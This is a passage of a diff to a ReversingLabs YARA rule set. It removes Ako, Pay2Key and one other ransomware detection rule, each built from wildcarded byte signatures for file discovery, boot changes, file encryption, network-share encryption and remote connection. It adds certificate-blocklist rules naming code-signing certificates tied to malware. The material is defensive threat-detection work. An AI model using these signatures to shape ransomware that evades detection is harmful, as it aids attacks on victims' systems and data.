?? ?? - 11 ?? 8E 69 28 ?? ?? ?? ?? 2B ?? 11 ?? 16 07 11 ?? 28 ?? ?? ?? ?? 11 ?? 8E 69 28 ?? ?? - ?? ?? DE ?? 26 DE ?? 26 DE ?? 00 07 28 ?? ?? ?? ?? 26 DE ?? 26 DE ?? 00 06 28 ?? ?? ?? - ?? 26 DE ?? 26 DE ?? DC 2A - } - $find_files = { - 73 ?? ?? ?? ?? 0A 06 02 7D ?? ?? ?? ?? 7E ?? ?? ?? ?? 06 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? - ?? 28 ?? ?? ?? ?? 2C ?? 2A 00 06 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? - ?? ?? 28 ?? ?? ?? ?? DE ?? 26 DE ?? 14 0B 06 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B DE ?? 26 - DE ?? 07 2C ?? 07 8E 16 FE 01 2B ?? 17 0C 06 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 16 13 - ?? 2B ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 11 ?? 9A 7D ?? ?? ?? ?? 08 2C ?? 11 ?? 7B ?? - ?? ?? ?? 28 ?? ?? ?? ?? 2B ?? 11 ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 14 28 ?? ?? ?? ?? - 26 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 32 ?? DE ?? 26 DE ?? 08 2C ?? DD ?? ?? ?? ?? 28 - ?? ?? ?? ?? 0D 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 17 - 6F ?? ?? ?? ?? 09 6F ?? ?? ?? ?? 09 6F ?? ?? ?? ?? 07 13 ?? 16 13 ?? 2B ?? 73 ?? ?? ?? - ?? 13 ?? 11 ?? 11 ?? 11 ?? 9A 7D ?? ?? ?? ?? 11 ?? 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? - 7E ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 7E ?? ?? ?? ?? 11 ?? FE 06 ?? - ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2D ?? 11 ?? 7B ?? ?? ?? ?? 09 28 ?? ?? ?? ?? DE - ?? 26 DE ?? 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 32 ?? 00 09 6F ?? ?? ?? ?? DE ?? 26 DE - ?? DE ?? 26 DE ?? 2A - } - $change_boot = { - 02 8E 2C ?? 02 16 9A 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 28 ?? ?? ?? ?? 2A 02 16 9A 72 - ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2A 02 16 9A 72 ?? ?? ?? - ?? 6F ?? ?? ?? ?? 2C ?? 17 80 ?? ?? ?? ?? 16 80 ?? ?? ?? ?? 02 16 9A 72 ?? ?? ?? ?? 6F - ?? ?? ?? ?? 2C ?? 17 80 ?? ?? ?? ?? 02 16 9A 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2C ?? 28 ?? - ?? ?? ?? 2A 28 ?? ?? ?? ?? 2C ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 72 ?? ?? - ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? - ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2A 28 ?? ?? ?? ?? 2A - } - condition: - uint16(0)==0x5A4D and ($change_boot) and ($find_files) and ( all of ($encrypt_files_p*)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "OF.PL sp. z o.o." and pe.signatures[i].serial=="3d:5e:71" and 1066997730<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Ako : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_C33187Fe848A65E8484Ea492Cb2Cbb18 : INFO FILE { meta: - description = "Yara rule that detects Ako ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "00d67696-998c-5bc3-95e7-0320ca558cdb" - date = "2020-07-15" - modified = "2020-07-15" + id = "fa05113a-a21e-5f21-aae3-b646e5b42dfb" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Ako.yara#L1-L152" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "488e9b528f75fcfaa8dd19859801e6e5a73575c33cd70c98ebaa9ae93025018b" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L12762-L12780" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "b66d67b74d73a143cb5301b232abd5f0f84f058223d4494b924a25dffb49037a" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Ako" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $encrypt_network_shares_win32_p1 = { - 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? - 33 C5 89 45 ?? 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 4D ?? 8B 45 ?? 50 8D 4D ?? E8 ?? ?? - ?? ?? 8B 4D ?? 81 C1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F B6 C8 85 C9 0F 85 ?? ?? ?? ?? 8B - 4D ?? E8 ?? ?? ?? ?? 0F B6 D0 85 D2 0F 85 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 45 - ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? E8 ?? ?? ?? ?? 0F B6 D0 85 D2 0F - 85 ?? ?? ?? ?? 8D 45 ?? 50 8B 4D ?? 83 C1 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? - E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 8B 4D ?? E8 ?? ?? ?? ?? 50 8D 95 - ?? ?? ?? ?? 52 8B 4D ?? E8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? - ?? ?? ?? 83 C4 ?? 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 4D ?? E8 ?? - ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? - ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 55 ?? 52 - 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 8D ?? ?? ?? ?? 51 - E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 - } - $encrypt_network_shares_win32_p2 = { - 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 50 8D 95 ?? - ?? ?? ?? 52 8B 4D ?? E8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? - ?? ?? 83 C4 ?? 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 4D ?? E8 ?? ?? - ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? - ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 50 8D 95 ?? ?? ?? ?? 52 - 8B 4D ?? E8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 - ?? 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D - ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? - ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? - ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 55 ?? 52 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? - E8 ?? ?? ?? ?? 0F B6 C8 85 C9 0F 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? EB ?? 8B 55 ?? - 83 C2 ?? 89 55 ?? 8D 4D ?? E8 ?? ?? ?? ?? 39 45 ?? 73 ?? 83 7D ?? ?? 76 ?? 8B 45 - } - $encrypt_network_shares_win32_p3 = { - 33 D2 B9 ?? ?? ?? ?? F7 F1 85 D2 75 ?? 6A ?? 68 ?? ?? ?? ?? 8B 55 ?? 52 8D 4D ?? E8 - ?? ?? ?? ?? 8B 45 ?? 83 C0 ?? 89 45 ?? EB ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? - 8D 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 55 ?? 52 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? - E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 - 8B 4D ?? E8 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 8B 4D ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? - ?? ?? 83 C4 ?? 50 8D 95 ?? ?? ?? ?? 52 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 - ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? - ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? - ?? 50 8B 4D ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 8D ?? ?? ?? ?? 51 8D - 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? - ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? - ?? 8A 45 ?? EB ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? - ?? ?? 32 C0 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D - C2 - } - $find_files_win32_p1 = { - 8B FF 55 8B EC 51 8B 4D ?? 53 57 33 DB 8D 51 ?? 66 8B 01 83 C1 ?? 66 3B C3 75 ?? 8B - 7D ?? 2B CA D1 F9 8B C7 41 F7 D0 89 4D ?? 3B C8 76 ?? 6A ?? 58 EB ?? 56 8D 5F ?? 03 - D9 6A ?? 53 E8 ?? ?? ?? ?? 8B F0 59 59 85 FF 74 ?? 57 FF 75 ?? 53 56 E8 ?? ?? ?? ?? - 83 C4 ?? 85 C0 75 ?? FF 75 ?? 2B DF 8D 04 7E FF 75 ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? - 85 C0 75 ?? 8B 7D ?? 8B CF E8 ?? ?? ?? ?? 8B D8 85 DB 74 ?? 56 E8 ?? ?? ?? ?? 59 EB - ?? 8B 47 ?? 89 30 83 47 ?? ?? 33 DB 6A ?? E8 ?? ?? ?? ?? 59 8B C3 5E 5F 5B 8B E5 5D - C3 33 C0 50 50 50 50 50 E8 ?? ?? ?? ?? CC 8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? - ?? ?? 33 C5 89 45 ?? 8B 55 ?? 8B 4D ?? 53 8B 5D ?? 89 8D ?? ?? ?? ?? 56 57 3B D3 74 - ?? 0F B7 02 8D 8D ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 84 C0 75 ?? 83 EA ?? 3B D3 75 ?? 8B - } - $find_files_win32_p2 = { - 8D ?? ?? ?? ?? 0F B7 32 83 FE ?? 75 ?? 8D 43 ?? 3B D0 74 ?? 51 33 FF 57 57 53 E8 ?? - ?? ?? ?? 83 C4 ?? EB ?? 56 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 2B D3 0F B6 C0 D1 FA 42 - F7 D8 68 ?? ?? ?? ?? 1B C0 33 FF 23 C2 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 57 50 E8 - ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 57 57 57 50 57 53 FF 15 ?? ?? ?? ?? 8B F0 8B - 85 ?? ?? ?? ?? 83 FE ?? 75 ?? 50 57 57 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 83 FE ?? 74 - ?? 56 FF 15 ?? ?? ?? ?? 8B C7 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3 8B - 48 ?? 2B 08 C1 F9 ?? 6A ?? 89 8D ?? ?? ?? ?? 59 66 39 8D ?? ?? ?? ?? 75 ?? 66 39 BD - ?? ?? ?? ?? 74 ?? 66 39 8D ?? ?? ?? ?? 75 ?? 66 39 BD ?? ?? ?? ?? 74 ?? 50 FF B5 ?? - ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 85 ?? ?? ?? - ?? 50 56 FF 15 ?? ?? ?? ?? 6A ?? 85 C0 8B 85 ?? ?? ?? ?? 59 75 ?? 8B 10 8B 40 ?? 8B - 8D ?? ?? ?? ?? 2B C2 C1 F8 ?? 3B C8 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 2B C1 6A ?? 50 - 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 ?? E9 - } - $encrypt_files_win32_p1 = { - 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? - 33 C5 89 45 ?? 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 4D ?? 83 7D ?? ?? 74 ?? 83 7D ?? ?? - 75 ?? 32 C0 E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 50 8B 4D ?? E8 ?? ?? ?? ?? - 89 85 ?? ?? ?? ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 73 ?? 32 C0 E9 ?? ?? ?? ?? C7 45 ?? - ?? ?? ?? ?? 33 C9 89 4D ?? 8D 55 ?? 52 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 32 - C0 E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 8B 8D ?? ?? ?? ?? - 51 8D 4D ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C7 45 ?? ?? - ?? ?? ?? 33 D2 89 55 ?? C7 45 ?? ?? ?? ?? ?? 33 C0 89 45 ?? 0F 57 C0 66 0F 13 85 ?? - ?? ?? ?? EB ?? 8B 8D ?? ?? ?? ?? 81 C1 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 D2 ?? 89 8D - ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 3B 45 ?? 0F 8F ?? ?? ?? ?? 7C ?? 8B - 8D ?? ?? ?? ?? 3B 4D ?? 0F 83 ?? ?? ?? ?? 0F 57 C0 66 0F 13 45 ?? 6A ?? 8D 55 ?? 52 - } - $encrypt_files_win32_p2 = { - 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 ?? C6 45 ?? ?? 8D 4D - ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8A 45 ?? E9 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 - 68 ?? ?? ?? ?? 6A ?? 8D 4D ?? E8 ?? ?? ?? ?? 50 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 85 C0 - 75 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8A 45 ?? E9 ?? ?? - ?? ?? 6A ?? 8D 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 85 C0 - 75 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8A 45 ?? E9 ?? ?? - ?? ?? C7 45 ?? ?? ?? ?? ?? EB ?? 8B 45 ?? 05 ?? ?? ?? ?? 89 45 ?? 8B 4D ?? 3B 4D ?? - 0F 83 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 03 45 ?? 50 6A ?? 8D 4D ?? - E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 95 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? 8D 45 - ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 6A ?? 8B 4D ?? 51 8B 4D ?? E8 ?? ?? ?? ?? 0F B6 D0 - 85 D2 75 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8A 45 ?? E9 - ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 8B 8D ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 50 8B 55 - ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 - ?? ?? ?? ?? 8A 45 ?? E9 ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 7D ?? ?? 75 ?? EB ?? E9 ?? ?? - ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 33 C0 89 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 89 4D - ?? 8B 95 ?? ?? ?? ?? 89 55 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 33 C0 89 85 - } - $encrypt_files_win32_p3 = { - 8B 8D ?? ?? ?? ?? 89 4D ?? 8B 95 ?? ?? ?? ?? 89 55 ?? 6A ?? 8D 45 ?? 50 8B 4D ?? 51 - 8B 55 ?? 52 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 8D 4D ?? 51 - 8B 4D ?? 83 C1 ?? E8 ?? ?? ?? ?? 50 8B 4D ?? 83 C1 ?? E8 ?? ?? ?? ?? 50 8B 55 ?? 52 - FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 4D ?? 83 C1 ?? E8 ?? ?? ?? ?? 39 45 ?? 75 ?? 0F 57 - C0 66 0F 13 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 89 45 ?? 8B 4D - ?? 89 4D ?? 8B 55 ?? 89 55 ?? 6A ?? 8D 45 ?? 50 6A ?? 8D 4D ?? 51 8B 55 ?? 52 FF 15 - ?? ?? ?? ?? 85 C0 74 ?? 83 7D ?? ?? 75 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D - ?? E8 ?? ?? ?? ?? 8A 45 ?? EB ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? - ?? ?? ?? 8A 45 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B - E5 5D C2 - } - condition: - uint16(0)==0x5A4D and ( all of ($find_files_win32_p*)) and ( all of ($encrypt_files_win32_p*)) and ( all of ($encrypt_network_shares_win32_p*)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "SELCUK GUNDOGDU" and (pe.signatures[i].serial=="00:c3:31:87:fe:84:8a:65:e8:48:4e:a4:92:cb:2c:bb:18" or pe.signatures[i].serial=="c3:31:87:fe:84:8a:65:e8:48:4e:a4:92:cb:2c:bb:18") and 1426204800<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Pay2Key : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_6Fc143Ba34Cabf1De7A4C7F8F4Cdad6D : INFO FILE { meta: - description = "Yara rule that detects Pay2Key ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "2e482222-0483-5fe3-bb87-cfadda8e7e7a" - date = "2021-04-14" - modified = "2021-04-14" + id = "546692ed-2506-56ad-b678-e74b857380a3" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Pay2Key.yara#L1-L99" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "2497504f3afc99523cb29e51652a24f4374316d57d4baf5cde8d22e75a425585" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L12782-L12798" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "ffe25e4478a2245d4e5b330bb9300fb6cb48afb0fe3bd72bd62a589eeee3fe89" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Pay2Key" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $find_files = { - 8B FF 55 8B EC 51 8B 4D ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 2B CA 83 C8 ?? 57 8B 7D ?? - 41 2B C7 89 4D ?? 3B C8 76 ?? 6A ?? 58 EB ?? 53 56 8D 5F ?? 03 D9 6A ?? 53 E8 ?? ?? - ?? ?? 8B F0 59 59 85 FF 74 ?? 57 FF 75 ?? 53 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? - FF 75 ?? 2B DF 8D 04 3E FF 75 ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 4D ?? - 56 E8 ?? ?? ?? ?? 6A ?? 8B F0 E8 ?? ?? ?? ?? 59 8B C6 5E 5B 5F 8B E5 5D C3 33 C0 50 - 50 50 50 50 E8 ?? ?? ?? ?? CC 8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 - 89 45 ?? 8B 4D ?? 53 8B 5D ?? 56 8B 75 ?? 57 89 B5 ?? ?? ?? ?? EB ?? 8A 01 3C ?? 74 - ?? 3C ?? 74 ?? 3C ?? 74 ?? 51 53 E8 ?? ?? ?? ?? 59 59 8B C8 3B CB 75 ?? 8A 11 80 FA - ?? 75 ?? 8D 43 ?? 3B C8 74 ?? 56 33 FF 57 57 53 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 33 FF - 80 FA ?? 74 ?? 80 FA ?? 74 ?? 80 FA ?? 74 ?? 8B C7 EB ?? 33 C0 40 0F B6 C0 2B CB 41 - F7 D8 68 ?? ?? ?? ?? 1B C0 23 C1 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 57 50 E8 ?? ?? - ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 57 57 57 50 57 53 FF 15 ?? ?? ?? ?? 8B F0 8B 85 ?? - ?? ?? ?? 83 FE ?? 75 ?? 50 57 57 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 83 FE ?? 74 ?? 56 - FF 15 ?? ?? ?? ?? 8B C7 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3 8B 48 ?? - 2B 08 C1 F9 ?? 89 8D ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 75 ?? 8A 8D ?? ?? ?? ?? 84 C9 - 74 ?? 80 F9 ?? 75 ?? 80 BD ?? ?? ?? ?? ?? 74 ?? 50 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? - ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? - ?? 85 C0 8B 85 ?? ?? ?? ?? 75 ?? 8B 10 8B 40 ?? 8B 8D ?? ?? ?? ?? 2B C2 C1 F8 ?? 3B - C8 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 - ?? E9 - } - $encrypt_files = { - 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? 53 56 57 A1 ?? ?? ?? ?? - 33 C5 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B D9 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? - 8B 43 ?? 2B 43 ?? 75 ?? 8B 75 ?? 8B 45 ?? 8B 4D ?? C7 45 ?? ?? ?? ?? ?? 89 06 89 4E - ?? 8B 4D ?? 89 4E ?? 8D 4D ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? - ?? 8B C6 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B E5 5D C2 ?? ?? 83 7B ?? ?? 74 - ?? 8B 45 ?? 2B 45 ?? 50 E8 ?? ?? ?? ?? 8B 75 ?? 8B F8 8B 55 ?? 2B F2 56 52 57 E8 ?? - ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? - 56 89 75 ?? E8 ?? ?? ?? ?? 56 57 50 89 45 ?? E8 ?? ?? ?? ?? 8B 75 ?? 8D 45 ?? 83 C4 - ?? 50 56 6A ?? 6A ?? 6A ?? FF 73 ?? FF 15 ?? ?? ?? ?? 8D 4D ?? 85 C0 75 ?? 8B 75 ?? - 89 45 ?? 89 45 ?? 89 45 ?? 89 06 89 46 ?? 89 46 ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? - ?? ?? 8B C6 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B E5 5D C2 ?? ?? FF 75 ?? E8 - ?? ?? ?? ?? FF 75 ?? 56 8B 75 ?? 56 E8 ?? ?? ?? ?? 8B 7D ?? 83 C4 ?? 8B 4D ?? 8B 45 - ?? C7 45 ?? ?? ?? ?? ?? 89 4F ?? 8D 4D ?? 89 37 89 47 ?? C7 45 ?? ?? ?? ?? ?? C7 45 - ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B C7 8B 4D ?? 64 89 0D ?? ?? - ?? ?? 59 5F 5E 5B 8B E5 5D C2 - } - $remote_connection_p1 = { - 55 8B EC 83 EC ?? 56 57 6A ?? 8B F2 8B F9 FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 8D 45 ?? C7 - 45 ?? ?? ?? ?? ?? 50 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 6A ?? 56 57 FF 15 ?? ?? ?? ?? - 8B 75 ?? 8B C8 8B D6 E8 ?? ?? ?? ?? 8B 0E 8B F8 83 F9 ?? 75 ?? 68 ?? ?? ?? ?? 8B CE - E8 ?? ?? ?? ?? EB ?? 81 F9 ?? ?? ?? ?? 75 ?? 68 ?? ?? ?? ?? 8B CE 